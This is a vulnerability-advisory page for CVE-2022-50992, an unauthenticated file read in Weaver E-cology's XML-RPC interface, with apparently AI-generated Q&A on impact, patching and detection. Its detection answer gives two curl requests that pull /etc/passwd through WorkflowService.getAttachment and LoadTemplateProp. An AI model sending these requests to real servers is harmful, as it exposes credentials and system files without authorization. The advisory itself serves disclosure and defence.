CVE-2022-50992
Arbitrary File Read in Weaver E-cology 9.5
Publication date: 2026-04-30
Last updated on: 2026-04-30
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| weaver | e-cology | to 10.52 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-22 | The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2022-50992 is an unauthenticated arbitrary file read vulnerability found in Weaver (Fanwei) E-cology versions prior to 10.52. It exists in the XmlRpcServlet interface at the XML-RPC endpoint, specifically in the WorkflowService.getAttachment and WorkflowService.LoadTemplateProp methods.
This vulnerability allows remote attackers to read arbitrary files on the server without needing to authenticate by supplying file paths to these methods.
Attackers can exploit this flaw to retrieve sensitive files such as system configuration files and database credentials, potentially compromising the server.
How can this vulnerability impact me? :
This vulnerability can have serious impacts as it allows unauthenticated remote attackers to access sensitive files on the affected server.
- Exposure of system configuration files which may reveal internal system details.
- Disclosure of database credentials that could lead to further unauthorized access or data breaches.
Such unauthorized access can compromise the confidentiality and security of the affected system and its data.
What immediate steps should I take to mitigate this vulnerability?
To mitigate the CVE-2022-50992 vulnerability in Weaver E-cology versions prior to 10.52, you should immediately upgrade your system to version 10.52 or later, where the vulnerability has been patched.
Before upgrading, ensure you perform offsite and off-media backups of your applications and databases.
After upgrading, follow any post-upgrade instructions such as accessing specific URLs to initialize data as required by the update.
Additionally, restrict exposure of unnecessary ports to the internet, allowing only essential ports like 80, 89, and 8088, and prohibit exposing remote desktop ports such as 3389 and 22.
Verify the integrity of downloaded patches by checking MD5 checksums.
If your system uses microservices like ESearch, restrict access to sensitive ports (e.g., 8099, 2098, 8090, 9300, 20981) to prevent internet exposure.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability allows unauthenticated remote attackers to read arbitrary files, including sensitive system configuration files and database credentials. This exposure of sensitive information could lead to unauthorized access to personal or protected data, potentially violating data protection regulations such as GDPR and HIPAA.
Since attackers can retrieve sensitive files without authentication, organizations using affected versions of Weaver E-cology may face increased risk of data breaches, which can result in non-compliance with standards requiring confidentiality and integrity of personal and sensitive information.
Mitigation through patching (upgrading to version 10.52 or later) and following security best practices as outlined in Weaver's security updates is critical to maintaining compliance and reducing the risk of regulatory penalties.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by attempting to access the XmlRpcServlet interface on Weaver E-cology versions prior to 10.52, specifically targeting the WorkflowService.getAttachment and WorkflowService.LoadTemplateProp methods to see if arbitrary files can be read without authentication.
A practical detection approach involves sending crafted HTTP requests to the XML-RPC endpoint to check if the server responds with file contents when file paths are supplied to these methods.
Example commands using curl to test for the vulnerability might include:
- curl -X POST -H "Content-Type: text/xml" --data '<methodCall><methodName>WorkflowService.getAttachment</methodName><params><param><value><string>/etc/passwd</string></value></param></params></methodCall>' http://target-server/XmlRpcServlet
- curl -X POST -H "Content-Type: text/xml" --data '<methodCall><methodName>WorkflowService.LoadTemplateProp</methodName><params><param><value><string>/etc/passwd</string></value></param></params></methodCall>' http://target-server/XmlRpcServlet
If the server returns the contents of the specified file (e.g., /etc/passwd), it indicates the presence of the vulnerability.